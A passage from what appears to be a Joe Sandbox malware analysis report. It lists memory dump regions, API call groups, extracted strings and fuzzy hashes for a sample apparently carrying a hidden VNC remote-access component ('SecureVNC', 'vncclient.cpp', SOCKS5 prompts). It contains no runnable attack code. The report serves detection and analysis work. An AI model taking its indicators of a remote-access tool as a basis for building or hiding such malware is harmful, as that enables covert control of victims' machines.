                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                                            • String ID:
                                                                            • API String ID: 540623443-0
                                                                            • Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                            • Instruction ID: df222387ff6578b016a7a6945ad518dc81936a048884ce32cf5bc121b702e58d
                                                                            • Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                            • Instruction Fuzzy Hash: 72113922A28A4286DBC0CF61E4816B833B4FB48BC9F405432DF8E86714DFBCD099C701
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recvsend
                                                                            • String ID: Enter SOCKS5 password for %s@%s:
                                                                            • API String ID: 740075404-2439350543
                                                                            • Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                            • Instruction ID: 75643eb8b4a0231e68596cc511ab4b92688dd26d8c4192612151e8803aeb0072
                                                                            • Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                            • Instruction Fuzzy Hash: 9151B462608A8284E7708F39A4403B9AA90FB4A7BDF545336EFADC3BD5DE6CD505C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: B
                                                                            • API String ID: 2959964966-1255198513
                                                                            • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                            • Instruction ID: d7ee87a07979a5cf3304eebc4174337d3c4f9d87c0b3c447dffa7ebd1023270b
                                                                            • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                            • Instruction Fuzzy Hash: 11317C32A1862288E791DF65A4404ED37B4BF487ADF640936EF9D93BC8CEB8D402C301
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: SecureVNC;0;0x%08x;%s
                                                                            • API String ID: 2959964966-2465057312
                                                                            • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                            • Instruction ID: 39b1efb40beea8efccbded25cd4c3cfd92d7db69f0254ca519d72a6097e5e815
                                                                            • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                            • Instruction Fuzzy Hash: B7219336B14B5189E761DF61A8405BE76B5BB087ADB640136EF9C93B88CEB8D401C340
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryFileModuleName
                                                                            • String ID: " -service
                                                                            • API String ID: 3981628254-877726483
                                                                            • Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                            • Instruction ID: 4859e83ca987a927a91df604da13ae07717951af0e9c8d030e5fe0399e980652
                                                                            • Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                            • Instruction Fuzzy Hash: 1B318221A08AC185E7659B20A8553B937B0FF99359F444236DBEC877D5DFACD129C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: B
                                                                            • API String ID: 2959964966-1255198513
                                                                            • Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                            • Instruction ID: c17c5ccadd501ef072f060d0dc7e7ec373f470cf2f0a27ce74053dff3e2b4478
                                                                            • Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                            • Instruction Fuzzy Hash: 6811603261874186EB609F15A4842AEB6B0FB88B99F584631EFDD87B95CEBCD540CB04
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                                            • String ID: <
                                                                            • API String ID: 2439412506-4251816714
                                                                            • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                            • Instruction ID: 8092bc11acb33373adbb4ce5556d68951199077285b25e2f0f02261f0226d648
                                                                            • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                            • Instruction Fuzzy Hash: 5A116A32A18A4186EBA08F12E4107AAB370FB88B48F545031EF8D47B59CF7CD916CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: I
                                                                            • API String ID: 2959964966-3707901625
                                                                            • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                            • Instruction ID: 1298589e7dca7f131d647cfb5e11c0530f468c6c27ae3e0d7c54e582eca8428e
                                                                            • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                            • Instruction Fuzzy Hash: B211A072A08B4085EB609F12A5402AAB7A4FB94FE8F184632EFDC47B95CF7CD5008B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$MappingOpenView
                                                                            • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                            • API String ID: 3439327939-3305976270
                                                                            • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                            • Instruction ID: 6a48c4cf07c72a27af7d7cbce8433c0568d543ac9ce06073f685be0fed798869
                                                                            • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                            • Instruction Fuzzy Hash: 94018E32509BC186E760CF64E44136AB3A0FB84B68F584235DBEA42B94CFBCD450C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$MappingOpenView
                                                                            • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                                            • API String ID: 3439327939-2897898322
                                                                            • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                            • Instruction ID: ecd079f9f80a8caf21192032a4f65d1ea8a4721113e651d9e37bfa233d3b25d1
                                                                            • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                            • Instruction Fuzzy Hash: 6E017C32508B9186E760CF64E44066AB3A0FB88B69F550335DAEA42B94CFB8D050C700
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressFreeLibraryProc
                                                                            • String ID: DllGetVersion
                                                                            • API String ID: 3013587201-2861820592
                                                                            • Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                            • Instruction ID: 5125bf6cc684ee2a75abed6e64647700f26ea4eb7fb7bda9ecb103ef039b3ae7
                                                                            • Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                            • Instruction Fuzzy Hash: D1011E2161C74182E7608F55F48003A76A0FB88B99F44453AEBDE82758DF7CD554CB00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDeleteSection
                                                                            • String ID: vncclient.cpp : update thread gone
                                                                            • API String ID: 166494926-1446885542
                                                                            • Opcode ID: 76988618689ac5a3949e64293531639e25bde67ea752ce089384153fb9c5267d
                                                                            • Instruction ID: f931113b123b7b0fb1d6a3670051c5e4cab51f9d7177e6d54bc1129562c74fc3
                                                                            • Opcode Fuzzy Hash: 76988618689ac5a3949e64293531639e25bde67ea752ce089384153fb9c5267d
                                                                            • Instruction Fuzzy Hash: AC015735A08A8291D680DF10D6503B86331FB49BA9F644632DFAD877A5DF6CE069C340
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLastMapping
                                                                            • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                            • API String ID: 1790465270-3305976270
                                                                            • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                            • Instruction ID: d8cfdd29227a3e76465a981041543ea05b56b16ca2f965f9e2ee259a35a92943
                                                                            • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                            • Instruction Fuzzy Hash: 640184325086C282E7A08F25A44036AB7A0E745779F548335EBFE427E8DFBCC494D710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessageObjectSendSingleWait
                                                                            • String ID: vncclient.cpp : client Kill() called
                                                                            • API String ID: 353115698-1198714380
